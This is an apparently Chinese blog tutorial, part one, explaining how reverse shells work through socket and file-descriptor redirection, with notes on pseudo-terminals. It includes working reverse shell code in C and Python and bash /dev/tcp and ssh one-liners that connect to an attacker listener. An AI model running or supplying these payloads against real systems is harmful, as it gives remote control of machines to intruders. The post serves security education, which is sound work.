【渗透测试】反弹 Shell 技术详解(一)

反弹 Shell 技术详解

一、前置知识

反弹 shell(Reverse Shell)是一种技术,攻击者利用它可以在远程主机上获得一个交互式的命令行接口。通常情况下,反弹 shell 会将标准输入(stdin)、标准输出(stdout)和标准错误(stderr)重定向到网络套接字(socket),以便在远程主机上执行命令并接收结果。攻击者的服务端通过监听来自受害服务器的请求,对目标服务器下发指令并获取执行结果,以达到控制受害服务器的目的。

二、反弹 Shell 的基本原理

1. 典型反弹 Shell 的原理

在典型的反弹 shell 中,攻击者会创建一个套接字(socket),并将其绑定到标准输入、输出和错误的文件描述符(0, 1, 2)。这样做的目的是让所有用户输入、程序输出和错误信息都通过这个套接字传输到远程服务器。

2. 文件描述符重定向

为了实现反弹 shell,一般需要以下几个步骤:

  • 创建一个套接字 并连接到远程服务器。
  • 使用 dup2() 系统调用将 标准输入(0)、标准输出(1)和标准错误(2)重定向到该套接字。
  • 执行一个新的 shell(如 /bin/sh/bin/bash),使得新启动的 shell 使用这些重定向的文件描述符。

C 语言实现示例:

int main() {
    int sockfd;
    struct sockaddr_in server_addr;

    // 创建套接字
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("Socket creation failed");
        return -1;
    }

    // 设置服务器地址
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(4444);  // 目标端口
    inet_pton(AF_INET, "192.168.1.100", &server_addr.sin_addr);  // 目标IP地址

    // 连接到服务器
    if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
        perror("Connection failed");
        return -1;
    }

    // 将标准输入、输出和错误重定向到套接字
    dup2(sockfd, 0);  // stdin
    dup2(sockfd, 1);  // stdout
    dup2(sockfd, 2);  // stderr

    // 执行新的 shell
    execve("/bin/sh", NULL, NULL);

    close(sockfd);
    return 0;
}

3. 关于文件描述符 0 1 2 的使用

并不是所有的反弹 shell 实现都严格使用文件描述符 0, 1, 2 指向套接字。虽然这是最常见的方式,但也有其他方法可以实现类似的效果:

  • 直接使用套接字文件描述符

    bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
    
  • 使用其他文件描述符

    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    dup2(sockfd, 10);  // 使用文件描述符 10 作为输出
    dup2(sockfd, 11);  // 使用文件描述符 11 作为输入
    dup2(sockfd, 12);  // 使用文件描述符 12 作为错误
    
  • 使用管道或者命名管道
    复杂的反弹 shell 实现可能会使用管道(pipe)或命名管道(FIFO)来实现数据的传递,而不是直接使用套接字文件描述符。

三、几种常见的反弹 Shell 的实现方式对比

使用 Bash 实现反弹 Shell

工作机制

Bash 是一个 Unix shell 和命令语言,广泛用于脚本编写和命令行操作。可以直接使用 Bash 内置功能来创建一个连接到远程服务器的交互式 shell。

文件描述符处理
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
  • 0 (stdin): 标准输入被重定向到 /dev/tcp/192.168.1.100/4444
  • 1 (stdout): 标准输出被重定向到 /dev/tcp/192.168.1.100/4444
  • 2 (stderr): 标准错误被重定向到 /dev/tcp/192.168.1.100/4444

基于网络套接字 Socket 的反弹 Shell 实现

示例代码【Python】
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.100", 4444))
os.dup2(s.fileno(), 0)  # 将标准输入重定向到套接字
os.dup2(s.fileno(), 1)  # 将标准输出重定向到套接字
os.dup2(s.fileno(), 2)  # 将标准错误重定向到套接字
subprocess.call(["/bin/sh", "-i"])  # 启动交互式 Bash shell

基于 SSH 的反弹 Shell 实现

示例代码【SSH】
ssh -R 4444:localhost:22 user@remote_server "bash -i >& /dev/tcp/localhost/4444 0>&1"

命令解释如下:

  • ssh -R:启用 ssh 远程端口转发功能,远端服务器的该端口流量转发到本地(远端启用端口给本地的操作机用)
  • -R 4444:localhost:22:在远程服务器上打开端口 4444,并将其转发到本地的 SSH 端口 22
  • user@remote_server:指定远程服务器的用户名和地址
  • "bash -i >& /dev/tcp/localhost/4444 0>&1":在远程服务器上启动一个交互式 Bash shell,并将其标准输入、输出和错误重定向到本地的 4444 端口。

其他反弹方式

  • 基于各种编程语言实现,原理和上述雷同
  • 基于各种第三方工具实现,原理上述相同
  • 复杂的反弹 shell 语句,结合各种管道(包括命名管道),伪终端中转和内存文件实现等

其他知识补充

伪终端

伪终端是指在 Linux 系统中,由终端模拟器创建的一对字符设备,包括一个 master 端和一个 slave 端。

设备类型
  • master 端:位于用户态,对应一个文件描述符,用于与终端模拟器(如终端窗口)交互。
  • slave 端:位于 /dev/pts/ 目录下的一个文件,用于与运行在虚拟终端上的程序交互。
功能与作用
  • 数据转发:伪终端驱动程序负责将 master 端的输入数据转发给 slave 端,反之亦然。例如,用户在终端窗口中输入的命令通过 master 端传送给 shell,shell 的输出则通过 slave 端返回给终端窗口显示。
  • 虚拟化:允许在图形界面或远程连接中模拟实际终端的行为,使得程序能够像在真实终端上运行一样,处理键盘输入和屏幕输出。
应用场景
  • 图形界面终端:如 xterm、gnome-terminal 等,通过伪终端实现用户与 shell 的交互。
  • 远程 shell:如 ssh 连接,客户端和服务器之间通过伪终端中继输入和输出。
  • 多路复用器:如 screen 和 tmux,通过伪终端实现会话的多路复用和切换。
技术实现
  • 创建伪终端:通过打开 /dev/ptmx 文件,系统会生成一个新的伪终端对,包括一个 master 和一个 slave 设备。
  • 文件描述符:master 端是一个文件描述符,而 slave 端是一个 /dev/pts/nn 文件,nn 是一个数字,表示特定的伪终端。
与终端的区别
  • 终端(tty):是物理设备或虚拟控制台,如 tty1-6,直接连接到键盘和显示器。
  • 伪终端(pty):是软件模拟的虚拟终端,用于图形界面或远程连接,提供与终端相似的功能。
安全性与检测

在反弹 Shell 的上下文中,伪终端可以被用来重定向 shell 的输入输出到网络连接,从而实现远程控制。例如,通过 bash -i >& /dev/tcp/10.10.XX.XX/666 0>&1 命令,可以将 shell 的输入输出重定向到指定的 TCP 地址,实现反弹 Shell 的功能。这种行为在安全检测中可能被视为异常,因为它绕过了正常的输入输出路径。


by 久违
好久没写了,抽空梳理点基础知识

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

久违 °

小菜鸟就要使劲飞

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值